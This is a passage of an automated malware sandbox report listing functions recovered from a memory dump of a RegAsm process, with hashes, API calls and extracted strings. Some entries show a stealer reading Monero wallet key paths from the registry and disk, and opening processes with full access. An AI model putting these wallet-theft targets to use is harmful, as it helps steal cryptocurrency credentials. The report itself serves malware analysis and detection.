                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92baf47d6df9dcf7c928efe7eb65f4a7c1dcf02faf436eed7d02622ad3a97832
                                                    • Instruction ID: 4e04e767b455ac498a5936da9db4e7039c809a933a39873d7fad93e6d7e30833
                                                    • Opcode Fuzzy Hash: 92baf47d6df9dcf7c928efe7eb65f4a7c1dcf02faf436eed7d02622ad3a97832
                                                    • Instruction Fuzzy Hash: F1815875D083828BD7108F20C84076ABBE2BF85382F8C0669E8D51B256EB3DF955C793
                                                    Function 1FA7F600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                    • Instruction ID: c19c0a49191998782e5faf71c85eac2119ec9f9a13a0536cbfb34a9db09182b3
                                                    • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                    • Instruction Fuzzy Hash: A751B075A043466BE700DF149D80F6BB7ECEF84714F40063DF94596241EB2EBA5A87E2
                                                    Function 1FAA1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FAA1B26
                                                    • misuse, xrefs: 1FAA1B21
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FAA1B17
                                                    • block, xrefs: 1FAA1A90
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-4016964285
                                                    • Opcode ID: 50b360e84241f54943dcb78a1693c25b6508300f7d25929726ac119e1f4986eb
                                                    • Instruction ID: 55af57beaad15ee975ccbcb0ff4a15fec9314394a9280e9027de383bc6b06e43
                                                    • Opcode Fuzzy Hash: 50b360e84241f54943dcb78a1693c25b6508300f7d25929726ac119e1f4986eb
                                                    • Instruction Fuzzy Hash: 2CC1BEB0A04311AFDB10CF25C884A9A7BA5BF447A4F054669ED499B341E73FF918CF92
                                                    Function 1FA4FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                    • API String ID: 0-1539118790
                                                    • Opcode ID: d98ddbba592d3755ba65c81c00241ac1617ba41abd1242daebea27bc4c3912b7
                                                    • Instruction ID: 2e964a05e7069680dbc61caa01e0663c6eba06d0aec0c6621b6eebef280fc229
                                                    • Opcode Fuzzy Hash: d98ddbba592d3755ba65c81c00241ac1617ba41abd1242daebea27bc4c3912b7
                                                    • Instruction Fuzzy Hash: 619125716443029BCB04DE29C884BDAB7E1BF85324F14856DF95D9B3A1E33EE846CB52
                                                    Function 1FB570B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                    • API String ID: 0-165706444
                                                    • Opcode ID: 58f0f68dcdf28e9c0bb64e4a6acdaa3c66b3beb4a8b0a34c8e79bba9be4858cd
                                                    • Instruction ID: 956383eabdd51c2f5504abc5640b3561d1eb8cb773383a6887db413ab32c3969
                                                    • Opcode Fuzzy Hash: 58f0f68dcdf28e9c0bb64e4a6acdaa3c66b3beb4a8b0a34c8e79bba9be4858cd
                                                    • Instruction Fuzzy Hash: D6619BB5B043486BDB219E21BC80F977799DF82325F2404A9FD148A262F72EF145C7A2
                                                    Function 1FA43A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                    • API String ID: 0-1499782803
                                                    • Opcode ID: 420d99e20ea875a068f7bde02117542b1f0096bfae20bd94c01612b55526a0b6
                                                    • Instruction ID: cf54f805ab3e8dcf8755e674c661263350243edc10772b55c16e49a3f56e55a0
                                                    • Opcode Fuzzy Hash: 420d99e20ea875a068f7bde02117542b1f0096bfae20bd94c01612b55526a0b6
                                                    • Instruction Fuzzy Hash: 1C510375A043019BDB10CF18D885B5A77E4AF40364F3944A9ED8ACB241E73FF856E762
                                                    Function 004110F9 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 00411107
                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000), ref: 00411146
                                                    • memset.MSVCRT ref: 00411194
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 00411339
                                                      • Part of subcall function 0040FE78: strlen.MSVCRT ref: 0040FE96
                                                      • Part of subcall function 0041002F: memcpy.MSVCRT ref: 00410062
                                                    Strings
                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004111B3
                                                    • N0ZWFt, xrefs: 00411298, 004112B1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OpenProcessmemcpymemsetstrlen
                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                    • API String ID: 4248304612-1622206642
                                                    • Opcode ID: b0afaa96b4597e210ba1a4c862ca121c709af7aa7cb7942423099bfa00805918
                                                    • Instruction ID: 6bc81985b16bb39c37c12c39f2d38016e25fa18ecaddaeab3ad7fb03e6b96229
                                                    • Opcode Fuzzy Hash: b0afaa96b4597e210ba1a4c862ca121c709af7aa7cb7942423099bfa00805918
                                                    • Instruction Fuzzy Hash: 4E612171D40219EFEB20DBA4DC86BEDB7B4AB04704F5040AAF618A61D1DBB85AC4CF59
                                                    Function 004010B9 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 150stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 004010D0
                                                      • Part of subcall function 00401055: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401069
                                                      • Part of subcall function 00401055: HeapAlloc.KERNEL32(00000000), ref: 00401070
                                                      • Part of subcall function 00401055: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0040108A
                                                      • Part of subcall function 00401055: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004010A5
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004010F7
                                                    • lstrlenA.KERNEL32(?), ref: 00401104
                                                    • lstrcatA.KERNEL32(?,.keys), ref: 0040111F
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 00412D64: GetSystemTime.KERNEL32(00000000,00425200), ref: 00412D8A
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                    • memset.MSVCRT ref: 004012F2
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$File$AllocCreateHeapLocalOpenlstrlenmemset$CloseFreeHandleObjectProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                    • API String ID: 2131673957-218353709
                                                    • Opcode ID: 3dccb5c2a575d22e4e50a91fcd560407ce44f22a403e94a74d02d22c1b458bb6
                                                    • Instruction ID: 5187a096fbb9e6a672ec0d50bbfcfb0db4b143f24dc30b3489d32bac6fd7d5a1
                                                    • Opcode Fuzzy Hash: 3dccb5c2a575d22e4e50a91fcd560407ce44f22a403e94a74d02d22c1b458bb6
                                                    • Instruction Fuzzy Hash: 775103B1D402199BCB15FB61DD96EED737DAB10304F4040AAF20AA20E1EE399BC5CE58
                                                    Function 1FB5B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                    • API String ID: 0-538076154
                                                    • Opcode ID: 77341ad2045aee932587dbb543ad58d0720e453628ab9d4a232c6cdb6e571f27
                                                    • Instruction ID: 5434c98ea63580729607ff14d9f94ca76f1898cb0f6cfa72a0441fe71a49a9aa
                                                    • Opcode Fuzzy Hash: 77341ad2045aee932587dbb543ad58d0720e453628ab9d4a232c6cdb6e571f27
                                                    • Instruction Fuzzy Hash: CB31BA75924384AFDF101A247C00ACB7BA5EF8532DF088528FDA566221F77DF5158BA3
                                                    Function 1FA7F4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                    • Instruction ID: 622aa9004e77124a56e7ee166575b4f931366eb91ee499c95afd29c1713ae38c
                                                    • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                    • Instruction Fuzzy Hash: B321A67AA0039276E7029A209E01FBF73DC6F41615F454969FE15A5140FB2DF74A83E3
                                                    Function 1FB3FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FB3FBA5
                                                    • misuse, xrefs: 1FB3FBA0
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB3FB96
                                                    • API called with NULL prepared statement, xrefs: 1FB3FB65
                                                    • API called with finalized prepared statement, xrefs: 1FB3FB7A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 0e5bf6e8d0772a812d12ad12d48c6437eaabe20a72ba7e29cbab86579786ccad
                                                    • Instruction ID: 934df6fe4bc08aced8480231f29f9e3daf747571f4d87f139f23e9391a1e8cf1
                                                    • Opcode Fuzzy Hash: 0e5bf6e8d0772a812d12ad12d48c6437eaabe20a72ba7e29cbab86579786ccad
                                                    • Instruction Fuzzy Hash: 47B1B1B4E847019BD7148F35E844B5777E4FF4471AF44092CE8CA8B242E77AF44A8BA2
                                                    Function 1FAB1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
